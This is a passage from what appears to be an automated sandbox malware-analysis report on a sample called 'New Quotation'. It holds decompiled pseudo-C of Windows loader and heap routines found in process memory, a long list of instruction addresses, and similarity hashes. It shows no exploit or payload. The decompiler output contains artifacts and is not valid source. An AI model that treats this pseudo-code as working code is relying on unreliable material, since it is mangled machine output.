													_t180 =  *_t179;
													__eflags = _t180;
													if(_t180 == 0) {
														goto L70;
													}
													 *(_t270 - 0x34) = _t180;
													_t265 = 0xfffffffe;
													 *((intOrPtr*)(_t270 - 4)) = _t265;
													L29:
													 *((intOrPtr*)(_t270 - 4)) = 1;
													E1D8188C0(_t270 - 0x2c, _t246, _t256 << 2);
													 *((intOrPtr*)(_t270 - 4)) = _t265;
													_t185 = 3;
													__eflags = _t256 - _t185;
													if(__eflags > 0) {
														 *(_t270 + 0x10) = _t185;
														L31:
														_t186 =  *(_t270 - 0x24);
														__eflags = _t186 - 0x10000;
														if(_t186 >= 0x10000) {
															 *((intOrPtr*)(_t270 - 4)) = 2;
															_t257 = 0;
															__eflags =  *_t186;
															if( *_t186 != 0) {
																E1D815050(0x3000, _t270 - 0x84, _t186);
																_t191 = E1D7F56E0(_t270 - 0x84, _t270 - 0x54);
																__eflags = _t191;
																if(_t191 != 0) {
																	L73:
																	 *((intOrPtr*)(_t270 - 4)) = _t265;
																	 *(_t270 - 0x24) =  *(_t270 - 0x54) & 0x0000ffff;
																	L34:
																	_t267 = _t225 & 0x00001000;
																	__eflags = _t225 & 0x00000300;
																	if((_t225 & 0x00000300) == 0) {
																		_t259 = _t225 & 0x00000400;
																		__eflags = _t259;
																		if(_t259 != 0) {
																			L92:
																			__eflags = (_t225 & 0x00001400) - 0x1400;
																			if(__eflags != 0) {
																				__eflags = _t267;
																				_t268 =  *(_t270 - 0x3c);
																				if(_t267 != 0) {
																					_t163 = E1D863C94(_t268);
																					L95:
																					__eflags = _t163;
																					if(_t163 >= 0) {
																						goto L98;
																					}
																					goto L25;
																				}
																				L98:
																				_t196 = E1D86327E(_t268, _t270 - 0x38, _t270 - 0x34, _t225);
																				 *(_t270 - 0x30) = _t196;
																				__eflags = _t196;
																				if(_t196 < 0) {
																					__eflags = _t196 - 0xc000020a;
																					if(_t196 != 0xc000020a) {
																						goto L21;
																					}
																					L38:
																					__eflags =  *(_t270 - 0x50);
																					if( *(_t270 - 0x50) != 0) {
																						_t163 = E1D863C94(_t268);
																						__eflags = _t163;
																						if(__eflags < 0) {
																							goto L25;
																						}
																						_t198 = E1D863608(_t225, _t268, _t225,  *(_t270 + 0x10), _t268, __eflags, _t270 - 0x2c,  *(_t270 + 0x10),  *((intOrPtr*)(_t270 - 0x4c)),  *(_t270 - 0x44),  *((intOrPtr*)(_t270 - 0x48)),  *(_t270 - 0x40));
																						L109:
																						 *(_t270 - 0x30) = _t198;
																						goto L21;
																					}
																					_t269 =  *(_t270 - 0x44);
																					_t261 =  *(_t270 + 0x10);
																					_t200 = E1D7DAD00( *(_t270 - 0x38),  *(_t270 - 0x34), _t225, _t270 - 0x2c,  *(_t270 + 0x10),  *((intOrPtr*)(_t270 - 0x4c)),  *(_t270 - 0x44),  *((intOrPtr*)(_t270 - 0x48)),  *(_t270 - 0x40));
																					 *(_t270 - 0x30) = _t200;
																					__eflags = _t200 - 0xc000008a;
																					if(_t200 != 0xc000008a) {
																						goto L21;
																					}
																					__eflags =  *((intOrPtr*)(_t270 - 0x2c)) - 0x18;
																					if( *((intOrPtr*)(_t270 - 0x2c)) == 0x18) {
																						goto L21;
																					}
																					__eflags =  *((intOrPtr*)(_t270 - 0x2c)) - 0x10;
																					if(__eflags == 0) {
																						goto L21;
																					} else {
																						__eflags = E1D7DBDE0(_t225, _t261, _t269, __eflags,  *(_t270 - 0x38), 0xf2ee, _t270 - 0x58, 0, 0x1000000);
																						if(__eflags < 0) {
																							goto L21;
																						}
																						 *(_t270 - 0x34) = 0;
																						_push(0);
																						_push(_t225);
																						_push(_t270 - 0x34);
																						_push( *((intOrPtr*)(_t270 - 0x58)));
																						_t206 = E1D7DAB70(_t225, _t261, _t269, __eflags);
																						__eflags = _t206;
																						if(_t206 < 0) {
																							goto L21;
																						}
																						__eflags = _t225 | 0x01000000;
																						_t198 = E1D7DAD00( *((intOrPtr*)(_t270 - 0x58)),  *(_t270 - 0x34), _t225 | 0x01000000, _t270 - 0x2c, _t261,  *((intOrPtr*)(_t270 - 0x4c)), _t269,  *((intOrPtr*)(_t270 - 0x48)),  *(_t270 - 0x40));
																						goto L109;
																					}
																				}
																				__eflags = _t259;
																				if(__eflags == 0) {
																					__eflags = 0;
																					_push(0);
																					_push(_t268);
																					_push( *(_t270 - 0x34));
																					_push(0);
																				} else {
																					_t259 = 0;
																					_push(0);
																					_push(0);
																					_push( *(_t270 - 0x34));
																					_push(_t268);
																				}
																				_push( *(_t270 - 0x38));
																				_t163 = E1D7D8B10(_t225, _t259, _t268, __eflags);
																				__eflags = _t163;
																				if(_t163 >= 0) {
																					goto L38;
																				} else {
																					goto L25;
																				}
																			}
																			_t268 =  *(_t270 - 0x3c);
																			_t163 = E1D863CD4(_t225, _t268, _t259, _t268, __eflags);
																			goto L95;
																		}
																		__eflags = _t225 & 0x00000800;
																		if((_t225 & 0x00000800) == 0) {
																			L37:
																			_t268 =  *(_t270 - 0x3c);
																			goto L38;
																		}
																		_t210 =  !_t225;
																		__eflags = _t210 & 0x00008000;
																		if((_t210 & 0x00008000) == 0) {
																			goto L37;
																		}
																		goto L92;
																	}
																	_t211 =  *(_t270 - 0x3c);
																	 *(_t270 - 0x38) = _t211;
																	__eflags = _t225 & 0x00000200;
																	if(__eflags != 0) {
																		__eflags = _t211 & 0x00000001;
																		if((_t211 & 0x00000001) == 0) {
																			_t213 = _t211 | 0x00000001;
																			__eflags = _t213;
																			 *(_t270 - 0x38) = _t213;
																			_t211 =  *(_t270 - 0x3c);
																		}
																		__eflags = _t267;
																		if(__eflags != 0) {
																			_t163 = E1D863C6A(_t211);
																			__eflags = _t163;
																			if(__eflags < 0) {
																				goto L25;
																			}
																		}
																	}
																	_push(_t257);
																	_push(_t225);
																	_push(_t270 - 0x34);
																	_push( *(_t270 - 0x38));
																	_t163 = E1D7DAB70(_t225, _t257, _t267, __eflags);
																	__eflags = _t163;
																	if(_t163 < 0) {
																		__eflags = _t267;
																		if(_t267 != 0) {
																			goto L25;
																		}
																	}
																	goto L37;
																}
																 *((intOrPtr*)(_t270 - 4)) = _t265;
																_t163 = 0xc000000d;
																goto L25;
															}
															 *(_t270 - 0x54) = 0;
															goto L73;
														}
														__eflags = _t186;
														if(_t186 != 0) {
															__eflags = _t186 & 0x000003ff;
															if((_t186 & 0x000003ff) == 0) {
																L81:
																 *(_t270 - 0x30) = 0xc000000d;
																goto L21;
															}
															__eflags = _t186 - 0x7f;
															if(_t186 == 0x7f) {
																goto L81;
															}
															_t257 = 0;
															 *((intOrPtr*)(_t270 - 0x60)) = 0;
															 *(_t270 - 0x5c) = 0;
															_t214 = E1D7F5A40(_t246, _t186, _t270 - 0x60, 2, 1);
															__eflags = _t214;
															if(_t214 < 0) {
																goto L81;
															}
															__eflags =  *(_t270 - 0x5c);
															if( *(_t270 - 0x5c) != 0) {
																E1D7E3B90(_t270 - 0x60);
															}
															goto L34;
														}
														L33:
														_t257 = 0;
														__eflags = 0;
														goto L34;
													}
													if(__eflags != 0) {
														goto L33;
													}
													goto L31;
												}
												_t265 = 0xfffffffe;
												goto L29;
											}
											goto L20;
										}
										__eflags = _t169;
										L17:
										if(_t290 != 0) {
											goto L20;
										}
										goto L18;
									}
									_t290 = _t225 & 0x00000e00;
									goto L17;
								}
								_t163 = 0xc00000f2;
								goto L25;
							}
							if(_t256 == 4) {
								goto L46;
							}
							goto L15;
						}
					}
				}
				L1:
				_t155 = 0x7ffe0385;
				goto L2;
			}











































                                                                                                                                                                                          0x1d7da8f0
                                                                                                                                                                                          0x1d7da8f2
                                                                                                                                                                                          0x1d7da8f7
                                                                                                                                                                                          0x1d7da8fc
                                                                                                                                                                                          0x1d7da8ff
                                                                                                                                                                                          0x1d7da902
                                                                                                                                                                                          0x1d7da905
                                                                                                                                                                                          0x1d7da90b
                                                                                                                                                                                          0x1d7da911
                                                                                                                                                                                          0x1d7da914
                                                                                                                                                                                          0x1d7da917
                                                                                                                                                                                          0x1d7da91d
                                                                                                                                                                                          0x1d7da922
                                                                                                                                                                                          0x1d7da927
                                                                                                                                                                                          0x1d7da928
                                                                                                                                                                                          0x1d7da92e
                                                                                                                                                                                          0x1d7da92f
                                                                                                                                                                                          0x1d7da933
                                                                                                                                                                                          0x1d7da93c
                                                                                                                                                                                          0x1d7da93d
                                                                                                                                                                                          0x1d7da941
                                                                                                                                                                                          0x1d7da945
                                                                                                                                                                                          0x1d7da952
                                                                                                                                                                                          0x1d7da957
                                                                                                                                                                                          0x1d832cd8
                                                                                                                                                                                          0x1d832cdb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832cea
                                                                                                                                                                                          0x1d7da962
                                                                                                                                                                                          0x1d7da965
                                                                                                                                                                                          0x1d832cf4
                                                                                                                                                                                          0x1d832cf9
                                                                                                                                                                                          0x1d832cfe
                                                                                                                                                                                          0x1d832d00
                                                                                                                                                                                          0x1d832d12
                                                                                                                                                                                          0x1d832d02
                                                                                                                                                                                          0x1d832d0b
                                                                                                                                                                                          0x1d832d0b
                                                                                                                                                                                          0x1d832d1a
                                                                                                                                                                                          0x1d832d1f
                                                                                                                                                                                          0x1d7da96b
                                                                                                                                                                                          0x1d7da96b
                                                                                                                                                                                          0x1d7da96b
                                                                                                                                                                                          0x1d7da972
                                                                                                                                                                                          0x1d832d31
                                                                                                                                                                                          0x1d832d31
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7da980
                                                                                                                                                                                          0x1d7da982
                                                                                                                                                                                          0x1d832d27
                                                                                                                                                                                          0x1d832d2b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832d2b
                                                                                                                                                                                          0x1d7da988
                                                                                                                                                                                          0x1d7da988
                                                                                                                                                                                          0x1d7da991
                                                                                                                                                                                          0x1d7dab2d
                                                                                                                                                                                          0x1d7dab2d
                                                                                                                                                                                          0x1d7da99d
                                                                                                                                                                                          0x1d7da99f
                                                                                                                                                                                          0x1d7da99f
                                                                                                                                                                                          0x1d7da9ab
                                                                                                                                                                                          0x1d7daa07
                                                                                                                                                                                          0x1d7daa07
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7da9ad
                                                                                                                                                                                          0x1d7da9ad
                                                                                                                                                                                          0x1d7da9b3
                                                                                                                                                                                          0x1d7dab38
                                                                                                                                                                                          0x1d7dab3b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832d3d
                                                                                                                                                                                          0x1d832d3d
                                                                                                                                                                                          0x1d7daa0e
                                                                                                                                                                                          0x1d7daa0e
                                                                                                                                                                                          0x1d7daa13
                                                                                                                                                                                          0x1d7daa13
                                                                                                                                                                                          0x1d7daa1e
                                                                                                                                                                                          0x1d7daa23
                                                                                                                                                                                          0x1d833020
                                                                                                                                                                                          0x1d833023
                                                                                                                                                                                          0x1d833032
                                                                                                                                                                                          0x1d833032
                                                                                                                                                                                          0x1d833023
                                                                                                                                                                                          0x1d7daa2c
                                                                                                                                                                                          0x1d83303d
                                                                                                                                                                                          0x1d833042
                                                                                                                                                                                          0x1d833044
                                                                                                                                                                                          0x1d83304f
                                                                                                                                                                                          0x1d83304f
                                                                                                                                                                                          0x1d83304f
                                                                                                                                                                                          0x1d83305b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7daa32
                                                                                                                                                                                          0x1d7daa32
                                                                                                                                                                                          0x1d7daa32
                                                                                                                                                                                          0x1d7daa35
                                                                                                                                                                                          0x1d7daa38
                                                                                                                                                                                          0x1d7daa44
                                                                                                                                                                                          0x1d7daa44
                                                                                                                                                                                          0x1d7daa2c
                                                                                                                                                                                          0x1d7da9b9
                                                                                                                                                                                          0x1d7da9bc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7da9c4
                                                                                                                                                                                          0x1d7da9c7
                                                                                                                                                                                          0x1d7dab46
                                                                                                                                                                                          0x1d7dab49
                                                                                                                                                                                          0x1d832d49
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832d49
                                                                                                                                                                                          0x1d7dab4f
                                                                                                                                                                                          0x1d7dab4f
                                                                                                                                                                                          0x1d7dab51
                                                                                                                                                                                          0x1d7da9d6
                                                                                                                                                                                          0x1d7da9dc
                                                                                                                                                                                          0x1d832d64
                                                                                                                                                                                          0x1d832d66
                                                                                                                                                                                          0x1d832d6c
                                                                                                                                                                                          0x1d832d75
                                                                                                                                                                                          0x1d832d77
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7da9ea
                                                                                                                                                                                          0x1d7da9ec
                                                                                                                                                                                          0x1d7da9f1
                                                                                                                                                                                          0x1d7da9f4
                                                                                                                                                                                          0x1d832d84
                                                                                                                                                                                          0x1d832d86
                                                                                                                                                                                          0x1d832d8b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832d91
                                                                                                                                                                                          0x1d7daa05
                                                                                                                                                                                          0x1d7daa4c
                                                                                                                                                                                          0x1d7daa4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7daa52
                                                                                                                                                                                          0x1d7daa55
                                                                                                                                                                                          0x1d7daa5b
                                                                                                                                                                                          0x1d832d96
                                                                                                                                                                                          0x1d832d99
                                                                                                                                                                                          0x1d832d9f
                                                                                                                                                                                          0x1d832dbc
                                                                                                                                                                                          0x1d832dbc
                                                                                                                                                                                          0x1d832dc3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832dc3
                                                                                                                                                                                          0x1d832da1
                                                                                                                                                                                          0x1d832da4
                                                                                                                                                                                          0x1d832da6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832da8
                                                                                                                                                                                          0x1d832daa
                                                                                                                                                                                          0x1d832dac
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832dae
                                                                                                                                                                                          0x1d832db3
                                                                                                                                                                                          0x1d832db4
                                                                                                                                                                                          0x1d7daa64
                                                                                                                                                                                          0x1d7daa64
                                                                                                                                                                                          0x1d7daa76
                                                                                                                                                                                          0x1d7daa7e
                                                                                                                                                                                          0x1d7daa83
                                                                                                                                                                                          0x1d7daa84
                                                                                                                                                                                          0x1d7daa86
                                                                                                                                                                                          0x1d7dab5c
                                                                                                                                                                                          0x1d7daa8e
                                                                                                                                                                                          0x1d7daa8e
                                                                                                                                                                                          0x1d7daa91
                                                                                                                                                                                          0x1d7daa96
                                                                                                                                                                                          0x1d832ded
                                                                                                                                                                                          0x1d832df4
                                                                                                                                                                                          0x1d832df6
                                                                                                                                                                                          0x1d832df9
                                                                                                                                                                                          0x1d832e15
                                                                                                                                                                                          0x1d832e25
                                                                                                                                                                                          0x1d832e2a
                                                                                                                                                                                          0x1d832e2c
                                                                                                                                                                                          0x1d832dfe
                                                                                                                                                                                          0x1d832dfe
                                                                                                                                                                                          0x1d832e05
                                                                                                                                                                                          0x1d7daaa6
                                                                                                                                                                                          0x1d7daaa8
                                                                                                                                                                                          0x1d7daaae
                                                                                                                                                                                          0x1d7daab4
                                                                                                                                                                                          0x1d832ecf
                                                                                                                                                                                          0x1d832ecf
                                                                                                                                                                                          0x1d832ed5
                                                                                                                                                                                          0x1d832ef2
                                                                                                                                                                                          0x1d832efb
                                                                                                                                                                                          0x1d832efd
                                                                                                                                                                                          0x1d832f1b
                                                                                                                                                                                          0x1d832f1d
                                                                                                                                                                                          0x1d832f20
                                                                                                                                                                                          0x1d832f0d
                                                                                                                                                                                          0x1d832f12
                                                                                                                                                                                          0x1d832f12
                                                                                                                                                                                          0x1d832f14
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832f16
                                                                                                                                                                                          0x1d832f22
                                                                                                                                                                                          0x1d832f2c
                                                                                                                                                                                          0x1d832f31
                                                                                                                                                                                          0x1d832f34
                                                                                                                                                                                          0x1d832f36
                                                                                                                                                                                          0x1d832f63
                                                                                                                                                                                          0x1d832f68
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7daae5
                                                                                                                                                                                          0x1d7daae5
                                                                                                                                                                                          0x1d7daae9
                                                                                                                                                                                          0x1d832f75
                                                                                                                                                                                          0x1d832f7a
                                                                                                                                                                                          0x1d832f7c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832f9a
                                                                                                                                                                                          0x1d832fc2
                                                                                                                                                                                          0x1d832fc2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832fc2
                                                                                                                                                                                          0x1d7daaf5
                                                                                                                                                                                          0x1d7daafc
                                                                                                                                                                                          0x1d7dab0b
                                                                                                                                                                                          0x1d7dab10
                                                                                                                                                                                          0x1d7dab13
                                                                                                                                                                                          0x1d7dab18
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dab1e
                                                                                                                                                                                          0x1d7dab22
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832fca
                                                                                                                                                                                          0x1d832fce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832fd4
                                                                                                                                                                                          0x1d832fed
                                                                                                                                                                                          0x1d832fef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832ff7
                                                                                                                                                                                          0x1d832ffa
                                                                                                                                                                                          0x1d832ffb
                                                                                                                                                                                          0x1d832fff
                                                                                                                                                                                          0x1d833000
                                                                                                                                                                                          0x1d833003
                                                                                                                                                                                          0x1d833008
                                                                                                                                                                                          0x1d83300a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832fb0
                                                                                                                                                                                          0x1d832fbd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832fbd
                                                                                                                                                                                          0x1d832fce
                                                                                                                                                                                          0x1d832f38
                                                                                                                                                                                          0x1d832f3a
                                                                                                                                                                                          0x1d832f46
                                                                                                                                                                                          0x1d832f48
                                                                                                                                                                                          0x1d832f49
                                                                                                                                                                                          0x1d832f4a
                                                                                                                                                                                          0x1d832f4d
                                                                                                                                                                                          0x1d832f3c
                                                                                                                                                                                          0x1d832f3c
                                                                                                                                                                                          0x1d832f3e
                                                                                                                                                                                          0x1d832f3f
                                                                                                                                                                                          0x1d832f40
                                                                                                                                                                                          0x1d832f43
                                                                                                                                                                                          0x1d832f43
                                                                                                                                                                                          0x1d832f4e
                                                                                                                                                                                          0x1d832f51
                                                                                                                                                                                          0x1d832f56
                                                                                                                                                                                          0x1d832f58
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832f5e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832f5e
                                                                                                                                                                                          0x1d832f58
                                                                                                                                                                                          0x1d832eff
                                                                                                                                                                                          0x1d832f04
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832f04
                                                                                                                                                                                          0x1d832ed7
                                                                                                                                                                                          0x1d832edd
                                                                                                                                                                                          0x1d7daae2
                                                                                                                                                                                          0x1d7daae2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7daae2
                                                                                                                                                                                          0x1d832ee5
                                                                                                                                                                                          0x1d832ee7
                                                                                                                                                                                          0x1d832eec
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832eec
                                                                                                                                                                                          0x1d7daaba
                                                                                                                                                                                          0x1d7daabd
                                                                                                                                                                                          0x1d7daac0
                                                                                                                                                                                          0x1d7daac6
                                                                                                                                                                                          0x1d832e97
                                                                                                                                                                                          0x1d832e99
                                                                                                                                                                                          0x1d832e9b
                                                                                                                                                                                          0x1d832e9b
                                                                                                                                                                                          0x1d832e9e
                                                                                                                                                                                          0x1d832ea1
                                                                                                                                                                                          0x1d832ea1
                                                                                                                                                                                          0x1d832ea4
                                                                                                                                                                                          0x1d832ea6
                                                                                                                                                                                          0x1d832eae
                                                                                                                                                                                          0x1d832eb3
                                                                                                                                                                                          0x1d832eb5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832ebb
                                                                                                                                                                                          0x1d832ea6
                                                                                                                                                                                          0x1d7daacc
                                                                                                                                                                                          0x1d7daacd
                                                                                                                                                                                          0x1d7daad1
                                                                                                                                                                                          0x1d7daad2
                                                                                                                                                                                          0x1d7daad5
                                                                                                                                                                                          0x1d7daada
                                                                                                                                                                                          0x1d7daadc
                                                                                                                                                                                          0x1d832ec0
                                                                                                                                                                                          0x1d832ec2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832ec8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7daadc
                                                                                                                                                                                          0x1d832e2e
                                                                                                                                                                                          0x1d832e31
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832e31
                                                                                                                                                                                          0x1d832dfb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832dfb
                                                                                                                                                                                          0x1d7daa9c
                                                                                                                                                                                          0x1d7daa9e
                                                                                                                                                                                          0x1d832e4e
                                                                                                                                                                                          0x1d832e53
                                                                                                                                                                                          0x1d832e8b
                                                                                                                                                                                          0x1d832e8b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832e8b
                                                                                                                                                                                          0x1d832e55
                                                                                                                                                                                          0x1d832e58
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832e5a
                                                                                                                                                                                          0x1d832e5c
                                                                                                                                                                                          0x1d832e5f
                                                                                                                                                                                          0x1d832e6b
                                                                                                                                                                                          0x1d832e70
                                                                                                                                                                                          0x1d832e72
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832e74
                                                                                                                                                                                          0x1d832e77
                                                                                                                                                                                          0x1d832e81
                                                                                                                                                                                          0x1d832e81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832e77
                                                                                                                                                                                          0x1d7daaa4
                                                                                                                                                                                          0x1d7daaa4
                                                                                                                                                                                          0x1d7daaa4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7daaa4
                                                                                                                                                                                          0x1d7daa8c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7daa8c
                                                                                                                                                                                          0x1d7daa63
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7daa63
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7daa05
                                                                                                                                                                                          0x1d832d6e
                                                                                                                                                                                          0x1d7da9e8
                                                                                                                                                                                          0x1d7da9e8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7da9e8
                                                                                                                                                                                          0x1d7da9e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7da9e2
                                                                                                                                                                                          0x1d832d53
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832d53
                                                                                                                                                                                          0x1d7da9d0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7da9d0
                                                                                                                                                                                          0x1d7da9ab
                                                                                                                                                                                          0x1d7da972
                                                                                                                                                                                          0x1d7da95d
                                                                                                                                                                                          0x1d7da95d
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • LdrResSearchResource Exit, xrefs: 1D7DA945
                                                                                                                                                                                          • LdrResSearchResource Enter, xrefs: 1D7DA933
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                          • API String ID: 0-4066393604
                                                                                                                                                                                          • Opcode ID: a088dd3dfa9eb37b0ab60ddb31441d887e7cff019467513fb11d46f1ce03fd4d
                                                                                                                                                                                          • Instruction ID: a17e4ac6a09e92b74848581421337df8966b7e13fdab3bd836669c0b24e8480f
                                                                                                                                                                                          • Opcode Fuzzy Hash: a088dd3dfa9eb37b0ab60ddb31441d887e7cff019467513fb11d46f1ce03fd4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CE1BD71E05749AFEB12DEA8C980BAEB7B9BF54720F11412AF908E7250D734D941CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D899ED2 Relevance: 2.8, Strings: 2, Instructions: 348COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                          			E1D899ED2(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v36;
				char _v40;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				char _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				char _v104;
				signed int _v108;
				signed int _v120;
				void* __ebx;
				signed int _t130;
				signed int _t133;
				void* _t134;
				signed int _t140;
				signed int _t144;
				signed int _t150;
				signed int _t162;
				intOrPtr* _t163;
				signed int _t171;
				signed int _t194;
				void* _t197;
				signed int _t200;
				signed int _t211;
				signed int _t212;
				signed int _t229;
				signed int _t236;
				signed int _t245;
				signed int _t248;
				void* _t252;
				void* _t256;
				signed int _t258;
				unsigned int* _t260;

				_t260 = __ecx;
				_v64 = __edx;
				_t245 = 0;
				_v100 = _v100 & 0;
				_v80 = 0;
				_push( *((intOrPtr*)(__ecx + 4)));
				_push( *((intOrPtr*)(__ecx)));
				_push(0);
				_push("true");
				_pop(_t197);
				_t194 = E1D8994F9(_t197, _t197);
				if(_t194 == 0) {
					L63:
					__eflags = _v100;
					if(_v100 != 0) {
						_push(_t260[1]);
						_push( *_t260);
						_push(0x8000);
						E1D898845( &_v100,  &_v96);
					}
					goto L65;
				} else {
					_t229 = _a4;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t248 = 0;
					_v92 = 0;
					if(( *(__ecx + 0xc) & 0x04000000) != 0 && 0x1fffff - (_t229 - 0x00000001 & 0x001fffff) < _t229 >> 2) {
						_t248 = 1;
						_v92 = 1;
					}
					while(1) {
						_t200 = 0;
						_v76 = 0;
						if(_t248 == 0) {
							__eflags =  *_t260 >> 8 - 2;
							if( *_t260 >> 8 < 2) {
								__eflags = (_t229 & 0x000fffff) - 1 - 0xfefff;
								if((_t229 & 0x000fffff) - 1 <= 0xfefff) {
									_t200 = 1;
									__eflags = 1;
									_v76 = 1;
								}
							}
							_v84 = _v84 & 0x00000000;
							_t130 = (_t200 << 0xc) + _t229;
							__eflags = _t130;
						} else {
							_v84 = 0x200000;
							_t130 = _t229 - (_t229 - 0x00000001 & 0x001fffff) + 0x1fffff;
						}
						_v96 = _t130;
						if(_t130 < _t229) {
							break;
						}
						_t133 = _t260[3] & 0x40000000;
						asm("sbb edi, edi");
						_t252 = ( ~_t133 & 0x0000003c) + 4;
						if(_t133 != 0) {
							_push(0);
							_push(0x1c);
							_push( &_v60);
							_push(3);
							_push(_t260);
							_push(0xffffffff);
							if(E1D812BE0() < 0 || (_v56 & 0x00000060) == 0 || _v60 != _t260) {
								E1D895FED(0, _t260, 1, _v56, 0, 0);
								_push("true");
								_pop(_t252);
							}
						}
						_t134 = E1D898009( &_v100,  &_v96, _v84, 0x2000, _t252,  *_t260, _t260[1]);
						_t277 = _t134;
						if(_t134 < 0) {
							_t114 =  &_v100;
							 *_t114 = _v100 & 0x00000000;
							__eflags =  *_t114;
							break;
						} else {
							_push(_t260[1]);
							_push( *_t260);
							E1D8996CB(_v100,  &_v68, _t277,  &_v88);
							 *_v80 = _t260;
							_t140 = _a4 + 0xfff >> 0xc;
							_v84 = _t140;
							_v96 = _t140 << 0xc;
							if(E1D8068EA(_t260[0x21] + _t260[0x14] << 0xc, _t260,  &(_t260[6])) == 0) {
								break;
							}
							_v96 = 0x1000;
							if(_v100 == 0) {
								__eflags = _a8 & 0x00000002;
								if((_a8 & 0x00000002) != 0) {
									_v96 = 0x40001000;
								}
							} else {
								_t241 = _v92;
								_v96 = 0x20001000;
								_t46 = _t241 - 1; // -1
								_v92 = _v92 + 0x1fffff - (_t46 & 0x001fffff);
							}
							_t144 = _t260[3] & 0x40000000;
							asm("sbb edi, edi");
